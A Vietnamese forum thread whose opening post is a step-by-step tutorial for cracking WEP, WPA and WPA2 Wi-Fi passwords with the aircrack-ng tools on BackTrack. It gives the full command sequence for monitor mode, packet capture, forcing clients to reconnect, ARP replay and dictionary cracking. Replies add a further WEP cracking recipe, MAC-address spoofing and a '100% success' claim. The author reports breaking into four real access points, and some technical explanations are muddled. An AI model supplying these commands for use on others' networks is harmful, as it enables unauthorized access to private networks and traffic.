Thưa các bác, hack wifi không còn là khài niệm mới đối với dân IT, chắc ai cũng từng một lần hack cho nó biết. Nhưng các tut trên mạng thường giới thiệu một cách qua loa hoặc chỉ làm mà không giải thích. Hôm nay tui xin mạn phép làm một tut từ A ->Z hường dẫn cụ thể và giải thích rõ ràng. Đang làm trong lúc hơi phê(mới làm vài chai) nên có gì nó không được chính xác thì bà con đóng góp ý kiến. Bài này sẽ dài nên mong những ai thực sự muốn học thì đọc từ đầu đến cuối, còn nếu vừa đọc vừa vứt thì đừng chê Tâm tui là tại sao thằng cha này viết dở thế. Trước khi bắt đầu xin nói trước là tui có tham khảo tren youtube.com cũng như đọc các bài viết trên CEH.VN. Xin cám ơn các bác bên đó trước và bài này sẽ không post hình vì post hình sẽ làm cho nhiều bạn rối, tốt nhất cứ làm rồi tìm hiểu. Và để dễ hiểu thì các bạn nên đọc các tài liệu trước khi bắt tay vào làm sẽ dễ hiểu hơn. Bắt tay vào hack chơi nào. Xin nói trước là crack giao thức bảo mật WEP, WPA, WPA2 đều giống nhau.
A.KHỞI ĐỘNG
1.Điều kiện
a. Có AP đang mở và hỗ trợ giao thức bảo mật
b. Có một Client đang kết nối với AP
c. Máy của hacker phải có card wireless và hỗ trợ chế độ monitor cũng như chế độ injection(chèn gói tin), và card wireless nên xài ở đây là Atheros, nhiều bạn làm trong máy ảo sẽ không được và phải mua thêm một cái USB wireless nữa. Lời khuyên cho các bạn là nên chép Backtrack ra CD và chạy thẳng trên máy thật hoặc cài luôn vào máy thật sẽ dễ thao tác hơn.
c.Một bộ từ điển như LONGMAN,BABYLON, thường những từ điển này dung lượng rất lớn. Người ta sẽ nén nhỏ lại nhưng khi bung ra thì cả 100GB, từ điển càng lớn thì cơ hội tìm được pass càng cao.

2.Các bước cơ bản trong khi hack
a. Chuyển card wireless về chế độ monitor(tức là chế độ nghe ngóng tín hiệu)
b. Scan mạng wireless và bắt dữ liệu từ AP
c. Bắt 4-way handshake(cái này sẽ xuất hiện khi máy hacker đã bắt tay được với AP)
d. Dùng Aircrack-ng kết hợp database để dò crack

B.THỰC HIỆN
1. Xem interface của card mạng
Dùng lệnh: iwcofig để xem có những card mạng nào trong máy, thường là eth0 và wlan0(chúng ta sẽ dùng wlan0)

2. Chuyển wlan0 về chế độ nghe ngóng
Dùng lệnh: airmon-ng wlan0 start. Lệnh này sẽ tạo ra một card wireless ảo là mon0

3. Scan mạng wireless trong vùng bắt sóng
Dùng lệnh: airodump-ng wlan0(mon0) để bắt sóng wifi. Ở đây bạn có thể làm trên SHELL mới hoặc làm trực tiếp trên SHELL cũ cũng được.

Có những lưu ý ở đây các bạn nên nắm rõ:
BSSID: Chính là MAC của AP cần hack
PWR: Càng cao càng tốt nhưng đa số nó ở chỉ số âm(-xx)
#Data: Dữ liệu càng cao càng tốt
#/s: Tốc độ kết nối càng cao càng tốt
CH: Kênh kết nối, nên lưu ý
ENC: Bảo mật theo giao thức nào đó WEP, WPA, WPA2,...
CIPHER: Mã hóa theo kiểu nào đó CCMP, WEP,...
AUTH: Chứng thực theo kiểu nào đó PSK, TKIP,...
ESSID: tên của AP, nếu AP đang ẩn tên thì nó sẽ có dạng
STATION: MAC của Client đang kết nối tới AP

4. Tiến hành bắt gói tin
Dùng lệnh: airodump-ng -c x --bssid -w wpa.cap wlan0
Với: x: tức là kênh kết nối của AP cần hack
MAC AP: MAC của AP cần hack
-w: tức là lệnh write
Ý nghĩa của dòng lệnh này là: Chúng ta sẽ bắt gói tin của AP trên kênh nào đó với cái BSSID là MAC của AP và ghi ra một file tên là wpa.cap(cái này thích tên gì cũng được)

5. Tiến hành bắt tay với AP(nên làm trên SHELL mới)
Dùng lệnh: aireplay-ng -1 0 -a -c wlan0

Trong cơ chế bảo mật WPA, khi muốn kết nối với AP thì Client cần phải gởi gói tin chứa 4-way handshake đến AP, trong gói tin đó chưa password(đã được hash) của mạng. Để được password ta phải có gói tin trên.
Lưu ý: aireplay-ng -1 0: gởi tin tới AP tới bao giờ được chứng thực
: chú ý dòng STATION, là nó đó
Ý nghĩa của lệnh này là AP sẽ thông báo Client đã bị đá ra khỏi mạng và client sẽ phải gửi gói tin chứa 4-wayhandshake để yêu cầu kết nối lại. Khi đó máy của hacker ta sẽ bắt được gói tin

Có một vài lưu ý ở đây

a. Khi bắt tay được với AP mình sẽ ghi lại những gói IV. Vậy IV là gì
WEP hay WPA sử dụng một vector khởi tạo (Initialization Vector - IV) cùng với khóa được chia sẽ (“shared-secret”) được người dùng nhập vào để tạo ra một mã khóa RC4 nhằm mục đích mã hóa các gói dữ liệu. Vì những lý do về cấu trúc kỹ thuật mà WEP, WPA có thể bị crack thông qua việc sử dụng các IV. Với một khóa WEP thì cỡ 5000 IVs

b. Với Aircrack-ng v1.0 thì để hack một khóa WEP 64b ta cần đọc cỡ 20.000 gói tin và 40.000 với WEP 128b. Cái này càng nhiều thì càng dễ tìm khóa.

c.Khi bạn dùng Aireplay mà thấy gói tin gởi đi mà không có trả lời(ACK) thì mình phải chuyển sang STATION khác và áp dụng tương tự.

d.Bạn có thể dùng lệnh : aireplay-ng --help để đọc kĩ hướng dẫn

e.Dùng lệnh aireplay-ng mà thấy data tăng lên thì mới được chứ data mà đứng yên thì móm rồi.

f. Khi không thể chứng thực với AP thì có nhiều nguyên nhân, sai kênh, sai MAC AP(BSSID), quá xa, không có Client nào đang kết nối với AP

6.Tạo cơ sở dữ liệu(phần này chua nè)
Mục đích phần này là ta sẽ so sánh password với cái CSDL có trong Backtrack, vì thực chất việc dò password là so sánh gói tin với list pass có sẵn trong máy

Dùng lệnh theo thứ tự:
-airolib-ng crackwpa import essid essid.txt Mình dùng lệnh này để tạo CSDL tên là crackwpa và import cái tên AP vào trong cái file essid.txt mình đã tạo sẵn(Mục này rất hay các bạn nên tìm hiểu)

-airolib-ng crackwpa import passwd /đường dẫn tời file password.lst (Mục này các bạn cũng nên tìm hiểu để hiểu vấn đề và nhớ lâu hơn)

-airolib-ng crackwpa --batch: Kết hợp essid với password

-airolib-ng crackwpa stats: kiểm tra tính hợp lệ

7.Crack wifi thôi nào
-aircrack-ng -a 1 wpa*.cap : Đọc những gì có trong file wpa.cap

Chú ý: *: toàn bộ file nào có tên wpa.cap là đọc hết(làm sẽ hiểu tại sao có dấu *)
1: Crack WEP, 2 thì crack WPA
He he, cách này thì crack WEP còn lâu chứ crack WPA tới mùa quýt năm sau. Vì cách này thì đọc những gì có trong file wpa thôi. Hên xui thì ra.

Bây giờ là lúc CSDL ra tay nè
-aircrack-ng -r crackwpa wpa*.cap
Ý nghĩa: Đọc và so sánh file wpa và file crackwpa. Vì lúc nãy ta đã import pass và essid vào crackwpa roài nên giờ 2 thằng đó chạy và so sánh nhau tới bao giờ trùng kết quả thì xuất ra màn hình thôi. Tốc độ sẽ nhanh hơn rất nhiều so với đọc file thô wpa.cap.

Lưu ý: Bắt được càng nhiều IV càng tốt, crack WEP còn dễ chứ WPA thì chua lắm tại vị từ điển nó là tiếng tây còn bác admin nào mà đặt là "kut3ilov3you$%^" thì khỏi ra luôn. Có nhiều kĩ thuật được áp dụng khi crack đó là tùy vào trình của người crack. Và crack chỉ để học hỏi không phải đi chôm mạng người khác. Mình đã hack được thực tế 4 cái AP với giao thức WEP còn WPA thì ngay cái router của nhà mình cũng bó tay .
Xin gửi mọi người 2 video tạo database và hack. Nguồn bài viết là do em thao khảo và mày mò làm rồi chia sẻ kinh nghiệm, xin các bác đừng chém, bài viết hơi dài lại viết trong lúc đang có tí men nên có thể có sai sót, chỗ nào sai chém mái thoải để em sửa.
Video: Xem cái này cùng đọc bài của em để hiểu rõ vấn đề
[You must be registered and logged in to see this link.] (tao database)
[You must be registered and logged in to see this link.] (hack chơi )

Vậy là chỉ hack dc wep thôi ah. bữa nay người ta dùng wpa ko thui.

100 gb ah. hulu

quangdai789 đã viết:100 gb ah. hulu

WPA Nua chu web ko dau ban!
UHM.giai ra hang 100gb lan ban!
hack wpa hay web chi trong khaon 15-20p la xong!nhu wpa2 thi hoi kho hen xui ha!
cau hinh may ban fai manh ak nhe!

Admin đã viết:

quangdai789 đã viết:100 gb ah. hulu

WPA Nua chu web ko dau ban!
UHM.giai ra hang 100gb lan ban!
hack wpa hay web chi trong khaon 15-20p la xong!nhu wpa2 thi hoi kho hen xui ha!
cau hinh may ban fai manh ak nhe!

BƯỚC 1: Download Back track 4 tại đây: [You must be registered and logged in to see this link.]

KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD

(Hoặc các bạn có thể boot bằng USB theo bài hướng dẫn này: [You must be registered and logged in to see this link.]

bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó


mediafire
[You must be registered and logged in to see this link.]
CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THIX HACK LIỀN

LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU


1.BT 4 beta
2.để tự động boot không chỉnh bất cứ dòng nào
3.login:root
4.pass:toor
5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu

CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng

mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0
8.aircrack-ng -b {ap bssid}

thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)

lượng DATA tối thiểu nên chờ là 40 000 nha các bạn

CHANGE mac NẾU CẦN THIẾT

change mac) thực hiện theo các lệnh sau
-(...) tên interface như WLAN0 chẳng hạn
airmon-ng
airmon-ng stop ...
iconfig ... down
macchanger --mac 00:11:22:33:44:55 ...
airmon-ng start ...

và khi đã monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn ko cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc
have fun


bác nào khi chạy iwconfig ko có thông tin card wifi của mình thì nên vào:
những hardware chạy dc trên BT4
những hardware hông hỗ trợ trên BT4


vô đó search theo loại card mà mình sử dụng, ko cần phải đăng kí để search

anh admin cho em linh download bộ từ điển: LONGMAN,BABYLON được không ạ?

đọc cái này đau hết cả đầu X_X

co ai huong dần mình dơn Backtrack ko ah - mình ko biết cach dơn - hĩ xin vui lòng hướng dẩn chi tiết rất chơn thành cảm ơn

cũng hơi khó làm đấy. Mà làm được rồi thì hơi bị vui đấy nha.